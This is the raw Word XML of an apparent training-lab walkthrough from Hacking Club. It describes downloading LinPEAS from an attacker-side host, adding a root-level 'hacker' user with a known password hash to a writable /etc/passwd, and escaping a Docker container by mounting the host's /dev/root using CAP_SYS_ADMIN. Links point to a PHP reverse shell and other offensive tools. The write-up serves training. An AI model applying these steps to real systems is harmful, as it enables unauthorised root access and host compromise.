        <w:t xml:space="preserve">script in order to identify potential vertical privilege escalation vectors within the compromised system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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10.0.15.12/linpeas.sh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linpeas.sh</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Xferd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Speed</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810k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810k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384k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384</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B0">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After transferring the script, the appropriate execution permissions were assigned and the script was executed. At the end of the analysis, LinPEAS indicated two relevant findings:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="36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environment is running inside a container (Docker);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A potential privilege escalation vector was identified that may allow elevation to the root user within the container.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5862638" cy="1813284"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="2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862638" cy="181328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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We identified that the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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file has write permissions, which allows, in this scenario, the addition of a new user with root privileges directly into the system, facilitating privilege escalation.</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openssl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"password123"</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$1$hacker$maoVUGb6XNp03USLr9Oqq1</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'hacker:$1$hacker$maoVUGb6XNp03USLr9Oqq1:0:0:root:/root:/bin/bash'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/etc/passwd</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inserting the user into the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">passwd </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file, we can execute the necessary command to assume root privileges within the compromised environment.</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862638" cy="1277754"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="2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862638" cy="127775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Our next objective is to escape the Docker environment and obtain direct access to the host in order to locate the final evidence. We performed a new enumeration using the CDK (Container Duck) tool. During this analysis, it was identified that the container is running with the CAP_SYS_ADMIN capability, providing sufficient advanced permissions to attempt a container escape.</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jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5834063" cy="1000392"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="2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834063" cy="100039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CDK reference link: </w:t>
      </w:r>
      <w:hyperlink r:id="rId25">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId26">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/cdk-team/CDK*</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C7">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Further analysis of the containerized environment revealed, through the df -h command output, that the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/hosts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file is mounted directly from</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /dev/root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, a device associated with the host filesystem:</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root@2bcf7a2d9b18:~#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Filesystem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Mounted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overlay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3.9G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9.7G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tmpfs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64M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64M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64M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64M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/dev/shm</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/dev/root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3.9G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9.7G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/etc/host</w:t>
      </w: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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This indicates that the container has visibility into the host’s root filesystem through bind mounts. Combined with the previously identified </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CAP_SYS_ADMIN</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> capability, this suggests the possibility of directly mounting the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> device into a controlled directory within the container, potentially granting full access to the host filesystem.</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/mnt</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/mnt</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lib64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bin.usr-is-merged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lost+found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sbin.usr-is-merged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tmp</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lib.usr-is-merged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srv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that, we gained access to the final evidence located inside the host’s root directory.</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center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5748338" cy="2238535"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="27"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48338" cy="2238535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln w="25400">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId28" w:type="default"/>
      <w:headerReference r:id="rId29" w:type="first"/>
      <w:headerReference r:id="rId30" w:type="even"/>
      <w:footerReference r:id="rId31" w:type="default"/>
      <w:footerReference r:id="rId32" w:type="first"/>
      <w:footerReference r:id="rId33"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widowControl w:val="0"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="-1276" w:right="289"/>
      <w:jc w:val="both"/>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">© 2025 Hacking Club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DD">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.se8l1g2is585"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-866773</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>95250</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="719138" cy="232221"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="16"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DE">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DF">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842519685038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0</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7820025" cy="10085729"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="17"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5781358</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6667500" cy="3001873"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="15"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Mautic</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5781358</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6667500" cy="3001873"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="15"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6667500" cy="3001873"/>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brightio/penelope" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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stringuetta/enumport" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cdk-team/CDK*" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cdk-team/CDK*" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xm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hyperlink" Target="https://app.hackingclub.com/training/training-machines/275"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footer" Target="footer1.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fstringuetta/enumport" TargetMode="External"/><Relationship Id="rId32"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14.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentestmonkey.net/tools/web-shells/php-reverse-shell" TargetMode="External"/><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hyperlink" Target="https://pentestmonkey.net/tools/web-shells/php-reverse-shell" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/brightio/penelope" TargetMode="External"/><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9up6m+hbxQatoH0GgnyhgVOIww==">CgMxLjAyDmguM3JyNGNwOXh4czZoMg5oLjg5aTd3ZGlhNHI2ajIOaC5neDQ0bXJwamd4NGsyDmguazYxM3VuYmZwczl6Mg5oLngydnFic3BxcHF1czIOaC41dTRxamVhZDZhcm0yDmguOGU4MGM2bTJpcGVyMg5oLnNlOGwxZzJpczU4NTgAciExTDh0bmFtbDlmVXhKekpuYjlGenZyRVBaRjhZSVN4dFA=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